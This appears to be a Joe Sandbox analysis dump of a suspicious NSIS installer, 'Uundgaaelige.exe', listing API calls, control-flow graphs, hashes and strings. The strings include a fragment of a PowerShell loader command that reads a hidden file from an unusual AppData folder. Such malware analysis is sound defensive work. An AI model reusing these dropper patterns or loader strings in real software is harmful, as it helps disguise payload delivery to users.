                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\raffineredes\cerous$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$shaharit Setup: Completed
                                                  • API String ID: 1975747703-3648823971
                                                  • Opcode ID: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                  • Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
                                                  • Opcode Fuzzy Hash: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                  • Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DAC
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Uundgaaelige.exe,00000400), ref: 00402DC8
                                                    • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                    • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Uundgaaelige.exe,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00402E11
                                                  • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402F58
                                                  Strings
                                                  • C:\Users\user\Desktop\Uundgaaelige.exe, xrefs: 00402DB2, 00402DC1, 00402DD5, 00402DF2
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DA2, 00402F70
                                                  • C:\Users\user\Desktop, xrefs: 00402DF3, 00402DF8, 00402DFE
                                                  • soft, xrefs: 00402E88
                                                  • Error launching installer, xrefs: 00402DE8
                                                  • Inst, xrefs: 00402E7F
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 00402D98
                                                  • Null, xrefs: 00402E91
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Uundgaaelige.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1236753566
                                                  • Opcode ID: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                  • Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
                                                  • Opcode Fuzzy Hash: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                                                  • Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C

                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 004061E6
                                                  • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004051F8,Completed,00000000), ref: 004061F9
                                                  • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,Completed,00000000,004051F8,Completed,00000000), ref: 00406235
                                                  • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 00406243
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                                                  • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                                                  • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,004051F8,Completed,00000000,00000000,00000000,00000000), ref: 004062C5
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$l8h
                                                  • API String ID: 717251189-609418067
                                                  • Opcode ID: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                  • Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
                                                  • Opcode Fuzzy Hash: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                                                  • Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E

                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Destroy,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Destroy,Destroy,00000000,00000000,Destroy,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp$C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll$C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne$Destroy
                                                  • API String ID: 1941528284-2576502423
                                                  • Opcode ID: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                                                  • Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
                                                  • Opcode Fuzzy Hash: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                                                  • Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 4051c0-4051d5 634 40528b-40528f 633->634 635 4051db-4051ed 633->635 636 4051f8-405204 lstrlenA 635->636 637 4051ef-4051f3 call 4060bb 635->637 638 405221-405225 636->638 639 405206-405216 lstrlenA 636->639 637->636 642 405234-405238 638->642 643 405227-40522e SetWindowTextA 638->643 639->634 641 405218-40521c lstrcatA 639->641 641->638 644 40523a-40527c SendMessageA * 3 642->644 645 40527e-405280 642->645 643->642 644->645 645->634 646 405282-405285 645->646 646->634
                                                  APIs
                                                  • lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                  • lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                  • lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                  • SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Completed
                                                  • API String ID: 2531174081-3087654605
                                                  • Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                  • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                                                  • Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                  • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 647 405686-4056d1 CreateDirectoryA 648 4056d3-4056d5 647->648 649 4056d7-4056e4 GetLastError 647->649 650 4056fe-405700 648->650 649->650 651 4056e6-4056fa SetFileSecurityA 649->651 651->648 652 4056fc GetLastError 651->652 652->650
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                  • GetLastError.KERNEL32 ref: 004056DD
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                                                  • GetLastError.KERNEL32 ref: 004056FC
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 00405686
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-1700792911
                                                  • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                  • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                                                  • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                  • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 4063c3-4063e3 GetSystemDirectoryA 654 4063e5 653->654 655 4063e7-4063e9 653->655 654->655 656 4063f9-4063fb 655->656 657 4063eb-4063f3 655->657 659 4063fc-40642e wsprintfA LoadLibraryExA 656->659 657->656 658 4063f5-4063f7 657->658 658->659
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                  • wsprintfA.USER32 ref: 00406413
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                                                  • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 660 401ffd-402009 661 4020c4-4020c6 660->661 662 40200f-402025 call 402ac1 * 2 660->662 664 402237-40223c call 401423 661->664 673 402034-402042 LoadLibraryExA 662->673 674 402027-402032 GetModuleHandleA 662->674 670 402951-402960 664->670 671 402716-40271d 664->671 671->670 676 402044-402051 GetProcAddress 673->676 677 4020bd-4020bf 673->677 674->673 674->676 678 402090-402095 call 4051c0 676->678 679 402053-402059 676->679 677->664 683 40209a-40209d 678->683 681 402072-402086 679->681 682 40205b-402067 call 401423 679->682 685 40208b-40208e 681->685 682->683 691 402069-402070 682->691 683->670 686 4020a3-4020ab call 403889 683->686 685->683 686->670 692 4020b1-4020b8 FreeLibrary 686->692 691->683 692->670
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                  Strings
                                                  • "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt, xrefs: 0040207C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt
                                                  • API String ID: 2987980305-3164695810
                                                  • Opcode ID: 8fd21b30ed73b6f6f786ebc1ec8206b0e1275513e3166378783415f75d1dd210
                                                  • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                                                  • Opcode Fuzzy Hash: 8fd21b30ed73b6f6f786ebc1ec8206b0e1275513e3166378783415f75d1dd210
                                                  • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 693 405c61-405c6b 694 405c6c-405c97 GetTickCount GetTempFileNameA 693->694 695 405ca6-405ca8 694->695 696 405c99-405c9b 694->696 698 405ca0-405ca3 695->698 696->694 697 405c9d 696->697 697->698
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C75
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64
                                                  • nsa, xrefs: 00405C6C
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 00405C61
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3025724165
                                                  • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
                                                  • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 699 4023d0-402401 call 402ac1 * 2 call 402b51 706 402951-402960 699->706 707 402407-402411 699->707 709 402421-402424 707->709 710 402413-402420 call 402ac1 lstrlenA 707->710 713 402426-402437 call 402a9f 709->713 714 402438-40243b 709->714 710->709 713->714 715 40244c-402460 RegSetValueExA 714->715 716 40243d-402447 call 40303e 714->716 721 402462 715->721 722 402465-402542 RegCloseKey 715->722 716->715 721->722 722->706 724 402716-40271d 722->724 724->706
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000023,00000011,00000002), ref: 0040241B
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 00402458
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 2655323295-223556267
                                                  • Opcode ID: 749fbfa3bc1171952234d739aaee5af5159f0d83cebea7c125393352a3cebceb
                                                  • Instruction ID: f5012b3eed6b0e10d725da1925ea8f3c2a7a7eca851d842cc00ee1163223ef4a
                                                  • Opcode Fuzzy Hash: 749fbfa3bc1171952234d739aaee5af5159f0d83cebea7c125393352a3cebceb
                                                  • Instruction Fuzzy Hash: DA115471E00215BEDF10EFA5DE89A9E7A74EB44754F21403BF508F71D1CAB84D419B29

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 725 402bb4-402bdd call 405f1f 727 402be2-402be4 725->727 728 402be6-402bec 727->728 729 402c5a-402c5e 727->729 730 402c08-402c1d RegEnumKeyA 728->730 731 402bee-402bf0 730->731 732 402c1f-402c31 RegCloseKey call 406431 730->732 733 402c40-402c4c RegCloseKey 731->733 734 402bf2-402c06 call 402bb4 731->734 739 402c33-402c3e 732->739 740 402c4e-402c54 RegDeleteKeyA 732->740 733->729 734->730 734->732 739->729 740->729
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                  • Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
                                                  • Opcode Fuzzy Hash: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                  • Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68
                                                  APIs
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                    • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne
                                                  • API String ID: 1892508949-3937776109
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,004061C4,80000002), ref: 00405FC6
                                                  • RegCloseKey.KERNELBASE(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405FD1
                                                  Strings
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3356406503-2954849223
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                                                  • CloseHandle.KERNEL32(?), ref: 0040576E
                                                  Strings
                                                  • Error launching installer, xrefs: 0040574B
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040315A
                                                    • Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
                                                  • SetFilePointer.KERNELBASE(000749E8,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  APIs
                                                    • Part of subcall function 0040639C: FindFirstFileA.KERNELBASE(77273410,00422580,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00405B62,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 004063A7
                                                    • Part of subcall function 0040639C: FindClose.KERNELBASE(00000000), ref: 004063B3
                                                  • lstrlenA.KERNEL32 ref: 00402285
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040228F
                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: 8a5359ab55cf707fdaf4c1bec01a7dc3010dae1b0a70d350ad33f0d8d509da0f
                                                  • Instruction ID: 7601fe6c075200cb0f0395ff2ba46aeb4d837e4f3c96b4285f6c21aa21cd7a5f
                                                  • Opcode Fuzzy Hash: 8a5359ab55cf707fdaf4c1bec01a7dc3010dae1b0a70d350ad33f0d8d509da0f
                                                  • Instruction Fuzzy Hash: F8117C71A14205AACB10EFF98949A9DBAF8AF44304F10403FA405FB2C2D6B8C5418B69
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 547aa21c4714850b9d30cdb1e69eaa8fead0b96bf9a6bfc192b103fbdf10e22d
                                                  • Instruction ID: 518a01c90e212b4e6c6a91e55dc37795372a660c14e02f5234546a481bba951e
                                                  • Opcode Fuzzy Hash: 547aa21c4714850b9d30cdb1e69eaa8fead0b96bf9a6bfc192b103fbdf10e22d
                                                  • Instruction Fuzzy Hash: 9901B171A04105AFE7159F69DE9CABF7ABCEF80348F10003EF405A61C0DAB84A419729
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                  • Instruction ID: d45136b7277fa4a4eeb989eab338d16e1e03b20585a5145be81ea7fda6220a17
                                                  • Opcode Fuzzy Hash: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                  • Instruction Fuzzy Hash: 6C314F31204259EFDB109F56DD44A9A7FA8EB08759F10803AF905FA190D378DA50DBA9
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 85e0e86c2224e170e7430ff9fe47b25ca0d4adbee95ba4f9787d494f05a4965f
                                                  • Instruction ID: 1b22629e75d9b419b9fa7e371b5212fc4da00fb077cffe61c988f7dc4f8aba71
                                                  • Opcode Fuzzy Hash: 85e0e86c2224e170e7430ff9fe47b25ca0d4adbee95ba4f9787d494f05a4965f
                                                  • Instruction Fuzzy Hash: 5511E771A05205EEDB15DF64DA8C5BE7BB4EF05348F20403FE446B72C0D6B88A42DB29
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
